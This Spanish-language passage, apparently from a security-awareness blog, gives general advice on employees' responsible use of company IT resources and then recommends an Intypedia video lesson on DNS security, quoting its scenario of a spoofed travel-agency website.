  • Si no lo hacen ellos, yo tampoco. Uno de los primeros aspectos a tener en cuenta de cara a conseguir el buen uso de los recursos e infraestructuras es que todos los empleados tienen que cumplir, desde el gerente o el responsable, hasta el administrativo. De poco sirve que tratar de que nuestros empleados cumplan con unas buenas prácticas o políticas de seguridad, si finalmente, los responsables no dan ejemplo.
  • Formación e información. En muchas ocasiones, el empleado, realiza un uso inadecuado por desconocimiento o falta de información. Por tanto, se hace necesario formar e informar a todos los trabajadores, de manera que cuenten con la información necesaria para desempeñar su labor de la forma más adecuada posible.
  • Hábitos, usos y responsabilidad. Por pequeña que sea la empresa u organización, es necesario contar con una guía de buenas prácticas o en su defecto una política de seguridad, donde se reflejen todos aquellos aspectos que el trabajador debe conocer en relación con el adecuado uso de las infraestructuras y los recursos que la empresa pone a su disposición, dejando claro además, cual es su responsabilidad.
  • Soluciones de seguridad y medios técnicos. Finalmente, la dirección puede estar concienciada, los empleados formados, la empresa dispone de una política de seguridad y un documento de buenas prácticas que todo el mundo conoce, pero si todo ello no lo sustentamos sobre herramientas o soluciones de seguridad, habremos conseguido el objetivo a medias. Además de lo anterior, es necesario contar con soluciones de seguridad: copias de seguridad, protección contra código malicioso, fraude o ingeniería social, cortafuegos, filtrado de contenidos, registro de accesos, etc.
Al final, el adecuado uso de las infraestructuras y los recursos que ponen las empresas y organizaciones a disposición de sus empleados, recaen en el empleado, que es al fin y al cabo, quien debe de tomar la decisión de actuar adecuadamente y hacer un uso responsable.

En Intypedia. Nuevo vídeo, lección 13. Seguridad en DNS

Al igual que en anteriores ocasiones, os recomendamos una nueva lección de Intypedia (Enciclopedia de Seguridad de la Información). En este caso, está orientada a la seguridad en DNS. Por Javier Osuna García‐Malo de Molina (GMV – Jefe de División de Consultoría de Seguridad y Proceso).
Según podemos leer en el resumen de esta lección;
Hola Bernardo, esta mañana la agencia de viajes donde trabaja una amiga ha tenido un
problema con su página Web y la forma en la que accedían sus clientes. He mirado su página y
parece que un atacante se ha aprovechado del funcionamiento del sistema DNS para simular la
página web de la agencia. Su intención era suplantarles y robar información de sus clientes.
Como no he estudiado detenidamente cómo funciona internamente DNS, ¿podrías
aconsejarme algo para orientar a mi amiga?
Información de apoyo
Guión [PDF][562KB]
Diapositivas [PDF][348KB]
Ejercicios [PDF][531KB]